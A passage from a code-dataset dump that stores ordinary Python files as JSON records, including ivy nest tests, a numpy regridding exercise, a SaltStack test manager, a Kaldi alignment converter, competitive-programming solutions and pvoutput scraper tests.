details.public\n self.result = details.result\n self.signal = details.signal\n self.stderr = details.stderr\n self.time = details.time\n self.link = details.link","sub_path":"rungist/RunGist/gistPyObject.py","file_name":"gistPyObject.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647687600","text":"\"\"\"\nCollection of tests for templated general functions\n\"\"\"\n\n# global\nimport copy\nimport pytest\n\n# local\nimport ivy\nimport ivy.numpy\n\n\n# Helpers #\n# --------#\n\ndef _snai(n, idx, v):\n if len(idx) == 1:\n n[idx[0]] = v\n else:\n _snai(n[idx[0]], idx[1:], v)\n\n\ndef _mnai(n, idx, fn):\n if len(idx) == 1:\n n[idx[0]] = fn(n[idx[0]])\n else:\n _mnai(n[idx[0]], idx[1:], fn)\n\n\n# Tests #\n# ------#\n\n# index_nest\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': (((2,), (4,)), ((6,), (8,)))}}])\n@pytest.mark.parametrize(\n \"index\", [('a', 0, 0), ('a', 1, 0), ('b', 'c', 0), ('b', 'c', 1, 0)])\ndef test_index_nest(nest, index, dev_str, call):\n ret = ivy.index_nest(nest, index)\n true_ret = nest\n for i in index:\n true_ret = true_ret[i]\n assert ret == true_ret\n\n\n# set_nest_at_index\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"index\", [('a', 0, 0), ('a', 1, 0), ('b', 'c', 0), ('b', 'c', 1, 0)])\n@pytest.mark.parametrize(\n \"value\", [1])\ndef test_set_nest_at_index(nest, index, value, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.set_nest_at_index(nest, index, value)\n _snai(nest_copy, index, value)\n assert nest == nest_copy\n\n\n# map_nest_at_index\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"index\", [('a', 0, 0), ('a', 1, 0), ('b', 'c', 0, 0, 0), ('b', 'c', 1, 0, 0)])\n@pytest.mark.parametrize(\n \"fn\", [lambda x: x + 2, lambda x: x**2])\ndef test_map_nest_at_index(nest, index, fn, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.map_nest_at_index(nest, index, fn)\n _mnai(nest_copy, index, fn)\n assert nest == nest_copy\n\n\n# multi_index_nest\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': (((2,), (4,)), ((6,), (8,)))}}])\n@pytest.mark.parametrize(\n \"multi_indices\", [(('a', 0, 0), ('a', 1, 0)), (('b', 'c', 0), ('b', 'c', 1, 0))])\ndef test_multi_index_nest(nest, multi_indices, dev_str, call):\n rets = ivy.multi_index_nest(nest, multi_indices)\n true_rets = list()\n for indices in multi_indices:\n true_ret = nest\n for i in indices:\n true_ret = true_ret[i]\n true_rets.append(true_ret)\n assert rets == true_rets\n\n\n# set_nest_at_indices\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"indices\", [(('a', 0, 0), ('a', 1, 0)), (('b', 'c', 0), ('b', 'c', 1, 0))])\n@pytest.mark.parametrize(\n \"values\", [(1, 2)])\ndef test_set_nest_at_indices(nest, indices, values, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.set_nest_at_indices(nest, indices, values)\n\n def snais(n, idxs, vs):\n [_snai(n, index, value) for index, value in zip(idxs, vs)]\n\n snais(nest_copy, indices, values)\n\n assert nest == nest_copy\n\n\n# map_nest_at_indices\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\n@pytest.mark.parametrize(\n \"indices\", [(('a', 0, 0), ('a', 1, 0)), (('b', 'c', 0, 0, 0), ('b', 'c', 1, 0, 
0))])\n@pytest.mark.parametrize(\n \"fn\", [lambda x: x + 2, lambda x: x**2])\ndef test_map_nest_at_indices(nest, indices, fn, dev_str, call):\n nest_copy = copy.deepcopy(nest)\n ivy.map_nest_at_indices(nest, indices, fn)\n\n def mnais(n, idxs, vs):\n [_mnai(n, index, fn) for index in idxs]\n\n mnais(nest_copy, indices, fn)\n\n assert nest == nest_copy\n\n\n# nested_indices_where\n@pytest.mark.parametrize(\n \"nest\", [{'a': [[0], [1]], 'b': {'c': [[[2], [4]], [[6], [8]]]}}])\ndef test_nested_indices_where(nest, dev_str, call):\n indices = ivy.nested_indices_where(nest, lambda x: x < 5)\n assert indices[0] == ['a', 0, 0]\n assert indices[1] == ['a', 1, 0]\n assert indices[2] == ['b', 'c', 0, 0, 0]\n assert indices[3] == ['b', 'c', 0, 1, 0]\n","sub_path":"ivy_tests/test_core/test_nest.py","file_name":"test_nest.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"305961155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n### Aufgabe 1 : Strings ###\n\nmyStrings = {}\ndata = np.genfromtxt(\"Daten/Data6_2.txt\", dtype = str, delimiter = '\\t')\n\nprint(data)\n\nfor entry in data:\n try:\n myStrings[entry] +=1\n except KeyError:\n myStrings[entry] = 1\nprint(myStrings)\n\n\n### Aufgabe 2 : Daten regridden ###\n\ndef regridArray(Array, Column, Grid):\n \"\"\"\n This function returns a new version of a numpy Array where data are\n averaged within boxes of a given grid. The new array contains the average\n value of the datapoints within each gridbox. If the datapoints coincide\n with the gridpoints this function reduces to a simple average.\n\n Parameters\n ----------\n Array : numpy Array\n numpy Array that contains separate data in columns\n Column : integer\n integer number of the column to which the array will be regridded\n Grid: 1D numpy Array\n Array that contains the gridpoints\n select = Grid(i)<= Array(:,Column) & Array(:,Column)< Grid(i+1)\n\n Returns\n ------\n result : numpy Array\n a numpy array that contains the regridded Array\n\n Example\n -------\n\n >>> AllDataAveraged =regridArray(AllDataNormalized,0,TimeGrid)\n\n This returns a numpy array that is regridded according to column 1 and the\n specified TimeGrid.\n\n \"\"\"\n\n time = Array[:, Column]\n ArrayTemp = Array\n ArrayNew = np.zeros((np.size(Grid), 2))\n ArrayNew[:, 0] = Grid\n counter = 0\n for t in range(np.size(Grid) - 1):\n select1 = time >= Grid[t]\n select2 = time < Grid[t + 1]\n select = select1 & select2\n if np.sum(select) <= 0.:\n ArrayNew = np.delete(ArrayNew, t - counter, 0)\n counter += 1\n else:\n ArrayNew[t - counter, 1] = np.mean(ArrayTemp[select, 1])\n\n return (ArrayNew)\n\n\n# Read Data\ndata = np.genfromtxt(\"MOKE.txt\", skip_header=1)\n\n# Create new Grid for Time\ngrid1 = np.linspace(-50, 0,2, endpoint=True)\ngrid2 = np.linspace(0, 1,5, endpoint=True)\ngrid3 = np.linspace(1, 100,10, endpoint=True)\ngrid4 = np.linspace(100, 1000, 50, endpoint=True)\ngrid = np.concatenate((grid1, grid2, grid3, grid4), axis=0)\n\n# Call regrid function, returns new Array\ndata_regrid = regridArray(data, 0, grid)\n\n# Plot Old vs New Array\nplt.plot(data[:, 0]-180, data[:, 1], label=('Original'))\nplt.plot(data_regrid[:, 0]-180, data_regrid[:, 1], 'o', label=('New Grid'))\nplt.legend()\nplt.title(\"MOKE Signal\")\nplt.xlabel(\"time (ps)\")\nplt.ylabel(\"Intensity 
(a.u.)\")\nplt.show()\nplt.savefig(\"RegridExample.png\")","sub_path":"Lecture05/Übung03_Aufgabe2_Lösung.py","file_name":"Übung03_Aufgabe2_Lösung.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541890785","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collections import defaultdict\n\nfrom datetime import datetime\nfrom pepper.libpepper import Pepper\nfrom tcp_tests import settings\nfrom tcp_tests import logger\nfrom tcp_tests.managers.execute_commands import ExecuteCommandsMixin\n\nLOG = logger.logger\n\n\nclass SaltManager(ExecuteCommandsMixin):\n \"\"\"docstring for SaltManager\"\"\"\n\n __config = None\n __underlay = None\n _map = {\n 'enforceState': 'enforce_state',\n 'enforceStates': 'enforce_states',\n 'runState': 'run_state',\n 'runStates': 'run_states',\n }\n\n def __init__(self, config, underlay, host=None, port='6969'):\n self.__config = config\n self.__underlay = underlay\n self.__port = port\n self.__host = host\n self.__api = None\n self.__user = settings.SALT_USER\n self.__password = settings.SALT_PASSWORD\n self._salt = self\n\n super(SaltManager, self).__init__(config=config, underlay=underlay)\n\n def install(self, commands):\n # if self.__config.salt.salt_master_host == '0.0.0.0':\n # # Temporary workaround. 
Underlay should be extended with roles\n # salt_nodes = self.__underlay.node_names()\n # self.__config.salt.salt_master_host = \\\n # self.__underlay.host_by_node_name(salt_nodes[0])\n\n self.execute_commands(commands=commands,\n label=\"Install and configure salt\")\n\n @property\n def port(self):\n return self.__port\n\n @property\n def host(self):\n if self.__host:\n return self.__host\n else:\n # TODO(ddmitriev): consider to add a check and raise\n # exception if 'salt_master_host' is not initialized.\n return self.__config.salt.salt_master_host\n\n @property\n def api(self):\n def login():\n LOG.info(\"Authentication in Salt API\")\n self.__api.login(\n username=self.__user,\n password=self.__password,\n eauth='pam')\n return datetime.now()\n\n if self.__api:\n if (datetime.now() - self.__session_start).seconds < 5 * 60:\n return self.__api\n else:\n # FIXXME: Change to debug\n LOG.info(\"Session's expired\")\n self.__session_start = login()\n return self.__api\n\n url = \"http://{host}:{port}\".format(\n host=self.host, port=self.port)\n LOG.info(\"Connecting to Salt API {0}\".format(url))\n self.__api = Pepper(url)\n self.__session_start = login()\n return self.__api\n\n def local(self, tgt, fun, args=None, kwargs=None):\n return self.api.local(tgt, fun, args, kwargs, expr_form='compound')\n\n def local_async(self, tgt, fun, args=None, kwargs=None):\n return self.api.local_async(tgt, fun, args, kwargs)\n\n def lookup_result(self, jid):\n return self.api.lookup_jid(jid)\n\n def check_result(self, r):\n if len(r.get('return', [])) == 0:\n raise LookupError(\"Result is empty or absent\")\n\n result = r['return'][0]\n if len(result) == 0:\n raise LookupError(\"Result is empty or absent\")\n LOG.info(\"Job has result for %s nodes\", result.keys())\n fails = defaultdict(list)\n for h in result:\n host_result = result[h]\n LOG.info(\"On %s executed:\", h)\n if isinstance(host_result, list):\n fails[h].append(host_result)\n continue\n for t in host_result:\n task = host_result[t]\n if task['result'] is False:\n fails[h].append(task)\n LOG.error(\"%s - %s\", t, task['result'])\n else:\n LOG.info(\"%s - %s\", t, task['result'])\n\n return fails if fails else None\n\n def enforce_state(self, tgt, state, args=None, kwargs=None):\n r = self.local(tgt=tgt, fun='state.sls', args=state)\n f = self.check_result(r)\n return r, f\n\n def enforce_states(self, tgt, state, args=None, kwargs=None):\n rets = []\n for s in state:\n r = self.enforce_state(tgt=tgt, state=s)\n rets.append(r)\n return rets\n\n def run_state(self, tgt, state, args=None, kwargs=None):\n return self.local(tgt=tgt, fun=state, args=args, kwargs=kwargs), None\n\n def run_states(self, tgt, state, args=None, kwargs=None):\n rets = []\n for s in state:\n r = self.run_state(tgt=tgt, state=s, args=args, kwargs=kwargs)\n rets.append(r)\n return rets\n\n def get_pillar(self, tgt, pillar):\n result = self.local(tgt=tgt, fun='pillar.get', args=pillar)\n return result['return']\n","sub_path":"tcp_tests/managers/saltmanager.py","file_name":"saltmanager.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357142431","text":"\nimport os\nimport sys\nfrom collections import defaultdict\nfrom textgrid import TextGrid, IntervalTier\n\ndef parse_ctm(ctm_path):\n file_dict = defaultdict(list)\n with open(ctm_path, 'r') as f:\n for line in f:\n line = line.strip()\n line = line.split(' ')\n filename = line[0]\n begin = float(line[2])\n duration = 
float(line[3])\n end = round(begin + duration, 2)\n label = line[4]\n file_dict[filename].append([begin, end, label])\n return file_dict\n\ndef find_max(input):\n return max(x[1] for x in input)\n\ndef ctm_to_textgrid(directory, out_directory):\n word_path = os.path.join(directory, 'word_ctm')\n if not os.path.exists(word_path):\n return\n phone_path = os.path.join(directory, 'phone_ctm')\n current = None\n word_dict = parse_ctm(word_path)\n phone_dict = parse_ctm(phone_path)\n num_files = len(word_dict)\n for i,(k,v) in enumerate(word_dict.items()):\n print('processing file {} of {}'.format(i,num_files))\n maxtime = find_max(v+phone_dict[k])\n tg = TextGrid(maxTime = maxtime)\n wordtier = IntervalTier(name = 'words', maxTime = maxtime)\n phonetier = IntervalTier(name = 'phones', maxTime = maxtime)\n for interval in v:\n wordtier.add(*interval)\n for interval in phone_dict[k]:\n phonetier.add(*interval)\n tg.append(wordtier)\n tg.append(phonetier)\n outpath = os.path.join(out_directory, k + '.TextGrid')\n tg.write(outpath)\n\nif __name__ == '__main__':\n base_dir = os.path.expanduser('~/dev/kaldi-trunk/egs/gp/s5/exp/GE')\n output_dir = os.path.expanduser('~/Documents/Data/GlobalPhone/German/aln')\n for d in os.listdir(base_dir):\n print(d)\n in_dir = os.path.join(base_dir, d)\n out_dir = os.path.join(output_dir, d)\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n ctm_to_textgrid(in_dir,out_dir)\n\n\n\n","sub_path":"german-alignment/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222141073","text":"from math import *\nfrom constants import *\nimport numpy as np\nimport coordinates\nimport matplotlib.pyplot as plt\nfrom reactionforces import *\n\n\"\"\"\nCalculation of the torsion due to Fact, P and q around hinge 2 check if that's okay\nthese are split up in the u,v,w components of the'new' reference frame\n\"\"\"\ndef heaviside(x):\n if x < 0:\n return 0\n elif x >= 0:\n return 1\nF_act = 39.72774618*1000 \ntheta_r = radians(theta) #convert degrees to radians\nq_w = 0#sin(theta_r) * q #z_component of q\nq_v = cos(theta_r) * q #y_component of q\nP_w = cos(theta_r) * P #z_component of P\nP_v = sin(theta_r) * P #y_component of P\nFact_w = cos(theta_r) * F_act #z_component of jammed actuator\nFact_v = sin(theta_r) * F_act #y_component of jammed actuator\n\n\nlstep = .001 #define spanwise step\nx = np.arange(0, l_a + lstep, lstep) #create array of x points spanwise\nT = []\nT2 = []\nxx = []\nfor x in np.arange(0, l_a + lstep, lstep):\n T.append(-1*Fact_v * (h/2) * (heaviside(x-(x_2 - x_a / 2.))) + Fact_w * (h/2) * (heaviside(x-(x_2 - x_a / 2.))) + P_v * (h/2) * (heaviside(x-(x_2 + x_a / 2.))) - P_w * (h/2) * (heaviside(x-(x_2 + x_a / 2.))) + q_v * x* (-1 * (0.25*C_a - h/2.)))\n xx.append(x*1000)\n T2.append(( Fact_w * (h/2) * (heaviside(x-(x_2 - x_a / 2.))) - P_w * (h/2) * (heaviside(x-(x_2 + x_a / 2.))) + q_v * x* (-1 * (0.25*C_a - h/2.))))\n \nplt.plot(xx ,T, label= \"Y and Z components \")\nplt.plot(xx, T2, label = \"Only Y components\")\nplt.ylabel(\"Torsion [Nm]\")\nplt.xlabel(\"Span wise location with origin at wingtip close to hinge 1\")\nplt.legend()\nplt.show()\n\narea_1 = pi * (h/2)**2 /2 #enclosed areas of cell 1 and two\narea_2 = (C_a- h/2) * h\ns_semi = pi* h/2 / t_sk #integral parts of formula of semi circle \ns_rib = h / t_sp #integral parts of formula of rib \ns_TE = coordinates.coordinate(C_a, h/2, n_st)[2]*2 / t_sk #integral parts of formula of 
part with straight lines \n\ndef shear_torque(T, s_semi, s_rib, s_TE, area_1, area_2):\n \"\"\"\n find shear flow due to torsion; cell 1 is semicircular part, cell2 is TE\n deflection cell 1 = deflection cell 2 \n and T = Tcell_1 + Tcell_2 \n now you can solve #see page 613 of Megson aircraft structures\n matrix [qcell_1, qcell_2]\n s_.. = distance of element / thickness\n \"\"\"\n q_T = []\n for i in range(0, len(T)): #for all x as before calculate shear 1 and two\n A = np.array([[(s_semi + s_rib)/(2*area_1*G)+ (s_rib)/(2*area_2*G), -1*((s_TE + s_rib)/(2*area_2*G) + (s_rib)/(2*area_1*G))], [2*area_1, 2*area_2]])\n B = np.array([0, T[i]])\n q1_T, q2_T = np.linalg.solve(A,B)\n q_T.append([q1_T, q2_T]) \n return q_T\nq_T = shear_torque(T, s_semi, s_rib, s_TE, area_1, area_2)\n\ndef theta(q_T, lstep): #gives the angle at all location\n \"\"\"split up as twist at actuator 1 is zero\"\"\"\n theta1 = [0]* (419)\n for i in range(417, -1, -1 ):\n d_theta_torque = (q_T[i][0]* (s_semi+s_rib) - q_T[i][1]*s_rib)/(2*area_1*G) * lstep\n theta1[i] = (d_theta_torque + theta1[i+1] )\n theta1.remove(0)\n theta2 = [0] \n for i in range(419 , len(q_T[:])):\n d_theta_torque = (q_T[i][0]* (s_semi+s_rib) - q_T[i][1]*s_rib)/(2*area_1*G) * lstep #p.613 formula megson where lstep = dz\n theta2.append(d_theta_torque + theta2[i-419])\n finaltheta = theta1 + theta2\n return (finaltheta)\n\ntheta_corrected = theta(q_T, lstep)\nplt.plot(xx, theta_corrected)#, xx, T)\n\ndef displacement_calc(theta, radius, dis_TE):\n displacementLE = []\n displacementTE = []\n for j in range(0, len(theta)):\n displacementLE.append( -1*theta[j]*radius)\n displacementTE.append(theta[j]* dis_TE)\n return [displacementLE, displacementTE]\ndisplacement = displacement_calc(theta_corrected, h/2, C_a -h/2)\n\n#plt.plot(xx, displacement[0], xx,displacement[1])\n \n\n\n","sub_path":"Torsion.py","file_name":"Torsion.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333579129","text":"#!/usr/bin/env python3\nimport logging\n\nfrom genie.conf import Genie\n\nfrom os import path\nfrom os import mkdir\n\n# To handle errors with connections to devices\nfrom unicon.core import errors\n\n\ndef create_non_existing_dir(dir_path):\n if not path.exists(dir_path):\n try:\n mkdir(dir_path)\n except PermissionError as e:\n log.error(f'Unable to create directory: {dir_path}.'\n f'Insufficient privileges. 
Error: {e}')\n exit(1)\n\n\ndef write_commands_to_file(abs_filename, command_output):\n try:\n with open(abs_filename, \"w\") as file_output:\n file_output.write(command_output)\n\n except IOError as e:\n log.error(f'Unable to write output to file: {abs_filename}.'\n f'Due to error: {e}')\n exit(1)\n\n\ndef collect_device_commands(testbed, commands_to_gather, dir_name):\n abs_dir_path = path.join(path.dirname(__file__), dir_name)\n\n create_non_existing_dir(abs_dir_path)\n\n log.info('Starting to collect output of the commands')\n\n for device_name, device in testbed.devices.items():\n # get operating system of a device from pyats_testbed.yaml\n device_os = device.os\n device_path = path.join(abs_dir_path, device_name)\n create_non_existing_dir(device_path)\n\n try:\n device.connect(log_stdout=False)\n except errors.ConnectionError:\n log.error(f'Failed to establish connection to: {device.name}.'\n f'Check connectivity and try again.')\n continue\n\n if commands_to_gather.get(device_os):\n for command in commands_to_gather[device_os]:\n filename_command = command.replace(' ', '_')\n filename_command = filename_command.replace('*', 'all')\n filename = device_name + '_' + filename_command\n abs_filename = path.join(device_path, filename)\n log.info(f'filename: {abs_filename}')\n\n command_output = device.execute(command, log_stdout=True)\n\n write_commands_to_file(abs_filename, command_output)\n else:\n log.error(f'No commands for operating system: {device_os} '\n f'of device: {device_name} has been defined. '\n f'This device has been skipped. Specify list of commands'\n f' for {device_os} and try again.')\n continue\n\n\ndef main():\n global log\n format = '%(asctime)s - %(filename)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=format)\n\n log = logging.getLogger(__name__)\n\n testbed_filename = './pyats_testbed.yaml'\n testbed = Genie.init(testbed_filename)\n\n commands_to_gather = {\n 'asa': ['show inventory', 'show running-config', 'show route',\n 'show ospf neighbor', 'show license all'],\n 'iosxe': ['show inventory', 'show running-config',\n 'show ip route vrf *', 'show ip ospf neighbor',\n 'show license feature'],\n 'nxos': ['show inventory', 'show running-config',\n 'show ip route vrf all', 'show ip ospf neighbor vrf all',\n 'show license usage']}\n\n dir_name = 'gathered_commands'\n\n collect_device_commands(testbed, commands_to_gather, dir_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"labpyats/task5_labpyats.py","file_name":"task5_labpyats.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186547600","text":"\ndef radix_sort(lst, base=10):\n def counting_sort(lst, digit, base):\n \tsize = len(lst)\n \toutput = [0]*size\n \tcount = [0]*base\n \tfor i in range(size):\n \t\tindex = int(lst[i]/digit)\n \t\tcount[index%base] += 1\n \tfor i in range(1,base): count[i]+=count[i-1]\n \tfor i in range(size-1,-1,-1):\n \t\tindex = int(lst[i]/digit)\n \t\toutput[count[index%base]-1] = lst[i]\n \t\tcount[index%base] -= 1\n \tfor i in range(size): lst[i]=output[i]\n maxval = max(lst)\n digit = 1\n while digit <= maxval:\n counting_sort(lst, digit, base)\n digit *= base\n","sub_path":"basic_code/radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554148305","text":"#!/usr/bin/env python\nfrom __future__ import 
print_function\n\nimport dace\nimport numpy as np\n\nN = 12\n\n\n@dace.program\ndef program(input, output):\n for t in range(3):\n\n @dace.map(_[0:N])\n def tasklet(i):\n a << input[i]\n b >> output(1, lambda a, b: a + b, 0)\n b = a\n\n\nif __name__ == \"__main__\":\n print('CR re-initialization test')\n\n A = np.random.rand(N)\n B = np.ndarray([1], dtype=A.dtype)\n B[0] = 100\n\n program(A, B)\n\n diff = abs(3 * np.sum(A) - B[0])\n print(\"Difference:\", diff)\n exit(0 if diff <= 1e-5 else 1)\n","sub_path":"tests/cr_reinit_test.py","file_name":"cr_reinit_test.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"547922122","text":"for tc in range(int(input())):\n N = int(input()) #Dimensi dari labirin\n P = input()\n myPath = []\n for char in P:\n if char == 'S':\n myPath.append('E')\n else:\n myPath.append('S')\n \n myPath = ''.join(myPath)\n print('Case #{}: {}'.format(tc+1, myPath))","sub_path":"Qualification Round 2019/you-can-go-your-own-way.py","file_name":"you-can-go-your-own-way.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"480465697","text":"import sys\nsys.setrecursionlimit(10**8)\ninput = sys.stdin.readline\n\ndef chk_count(n,r,c,count) :\n if (n == 0) :\n return count\n\n if (2**(n-1) <= r) :\n if (2**(n-1) <= c) : \n return chk_count(n-1,r-(2**(n-1)),c-(2**(n-1)),count+(2**((n-1)*2))*3)\n else :\n return chk_count(n-1,r-(2**(n-1)),c,count+(2**((n-1)*2))*2)\n else :\n if (2**(n-1) <= c) :\n return chk_count(n-1,r,c-(2**(n-1)),count+(2**((n-1)*2))*1)\n else :\n return chk_count(n-1,r,c,count)\n\nn,r,c = map(int, input().split())\nprint(chk_count(n,r,c,0))","sub_path":"장범규/[20.10.14]1074.py","file_name":"[20.10.14]1074.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"462351082","text":"import pytest\nimport numpy as np\nimport os\nimport pickle\nimport pandas as pd\nfrom functools import partial\n\nfrom pvoutput import mapscraper as ms\nfrom pvoutput.consts import MAP_URL\nfrom pvoutput.tests.test_utils import data_dir\nfrom pvoutput.tests.create_mapscraper_test_files import get_keys_for_dict\n\n\ndef get_cleaned_test_soup():\n test_soup_filepath = os.path.join(data_dir(), 'mapscraper_soup.pickle')\n with open(test_soup_filepath, 'rb') as f:\n test_soup = pickle.load(f)\n return ms.clean_soup(test_soup)\n\n\n@pytest.fixture(scope='module')\ndef get_test_dict_of_dfs():\n dict_filepath = os.path.join(data_dir(), 'mapscraper_dict_of_dfs.pickle')\n with open(dict_filepath, 'rb') as f:\n test_soup = pickle.load(f)\n return test_soup\n\n\n@pytest.fixture(scope='module')\ndef get_function_dict():\n #using partials so functions only get executed when needed\n soup = get_cleaned_test_soup()\n df = ms._process_system_size_col(soup)\n index = df.index\n keys = get_keys_for_dict()\n functions = (partial(ms._process_system_size_col, soup),\n partial(ms._process_output_col, soup, index),\n partial(ms._process_generation_and_average_cols, soup, index),\n partial(ms._process_efficiency_col, soup, index),\n partial(ms._process_metadata, soup))\n function_dict = dict(zip(keys, functions))\n return function_dict\n\n\ndef compare_function_output_to_pickle(key, function_dict, dict_of_dfs, series=False):\n df_from_func = function_dict[key]()\n test_df = dict_of_dfs[key]\n if series:\n return 
pd.testing.assert_series_equal(df_from_func, test_df)\n return pd.testing.assert_frame_equal(df_from_func, test_df, check_like=True)\n\n\ndef test_convert_to_country_code():\n assert ms._convert_to_country_code(1) == 1\n assert ms._convert_to_country_code('United Kingdom') == 243\n\n def _assert_raises(bad_countries, exception):\n for bad_country in bad_countries:\n with pytest.raises(exception):\n ms._convert_to_country_code(bad_country)\n pytest.fail('Failed to raise {} for country={}'\n .format(exception.__name__, bad_country))\n\n _assert_raises([-1, -100, 1000, 'blah'], ValueError)\n\n\ndef test_create_map_url():\n assert ms._create_map_url() == MAP_URL\n assert ms._create_map_url(country_code=1) == MAP_URL + '?country=1'\n assert ms._create_map_url(page_number=2) == MAP_URL + '?p=2'\n assert ms._create_map_url(ascending=True) == MAP_URL + '?d=asc'\n assert ms._create_map_url(ascending=False) == MAP_URL + '?d=desc'\n assert ms._create_map_url(sort_by='efficiency') == MAP_URL + '?o=gss'\n with pytest.raises(ValueError):\n ms._create_map_url(sort_by='blah')\n\n\ndef test_pv_system_size_metadata(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('pv_system_size_metadata', get_function_dict,\n get_test_dict_of_dfs) is None\n\n\ndef test_process_output_col(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_output_col',\n get_function_dict,\n get_test_dict_of_dfs, series=True) is None\n\n\ndef test_process_generation_and_average_cols(get_function_dict,\n get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_generation_and_average_cols',\n get_function_dict,\n get_test_dict_of_dfs) is None\n\n\ndef test_process_efficiency_col(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_efficiency_col',\n get_function_dict,\n get_test_dict_of_dfs,\n series=True) is None\n\n\ndef test_process_metadata(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_metadata',\n get_function_dict,\n get_test_dict_of_dfs) is None","sub_path":"pvoutput/tests/mapscraper_test.py","file_name":"mapscraper_test.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552720381","text":"\n\"\"\"\nModule for constants in OpenNSA.\n\nOften the same constants are used in multiple modules where one does not want\ncross-imports, like protocols/nsi2 and topology. This module gives a place to\nkeep them all. 
While not being particularly elegant it does solve a real\nproblem.\n\nIt is recommend to import this module as 'cnt' to keep the prefix short, but\nalso the same in the code base.\n\n\"\"\"\n\n\nURN_OGF_PREFIX = 'urn:ogf:network:'\n\nCS2_SERVICE_TYPE = 'application/vnd.org.ogf.nsi.cs.v2+soap'\n\nBIDIRECTIONAL = 'Bidirectional'\n\nEVTS_AGOLE = 'http://services.ogf.org/nsi/2013/07/descriptions/EVTS.A-GOLE'\n\nETHERNET = 'http://schemas.ogf.org/nml/2012/10/ethernet'\nETHERNET_VLAN = '%s#vlan' % ETHERNET\n\nP2P_SERVICE = 'http://schemas.ogf.org/nsi/2013/12/services/point2point#p2ps'\n\n","sub_path":"opennsa/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"615629887","text":"# -*- coding: utf-8 -*-\r\nfrom backend.lib.Wrapper import wrapper\r\nfrom backend.models import Vendor\r\n\r\ndef index(request):\r\n fields = Vendor._meta.get_all_field_names()\r\n fields.remove('invoice')\r\n fields.remove('invoiceproduct')\r\n fields.remove('itemproduct')\r\n fields.remove('product')\r\n fields.remove('purchase')\r\n fields.remove('id')\r\n fields.append('vendor')\r\n return wrapper(request=request, req_params=fields, worker=worker, context='vendor')\r\n\r\ndef worker(req):\r\n vendor = req.params()['vendor']\r\n name = req.params()['name']\r\n address_1 = req.params()['address_1']\r\n address_2 = req.params()['address_2']\r\n address_3 = req.params()['address_3']\r\n address_4 = req.params()['address_4']\r\n address_5 = req.params()['address_5']\r\n phone_num_1 = req.params()['phone_num_1']\r\n phone_num_2 = req.params()['phone_num_2']\r\n cell_phone_num = req.params()['cell_phone_num']\r\n fax_num = req.params()['fax_num'] \r\n web = req.params()['web']\r\n category = req.params()['category']\r\n account_num = req.params()['account_num']\r\n contact = req.params()['contact']\r\n email = req.params()['email']\r\n payment_terms = req.params()['payment_terms']\r\n delivery_charge = req.params()['delivery_charge']\r\n delivery_minimum = 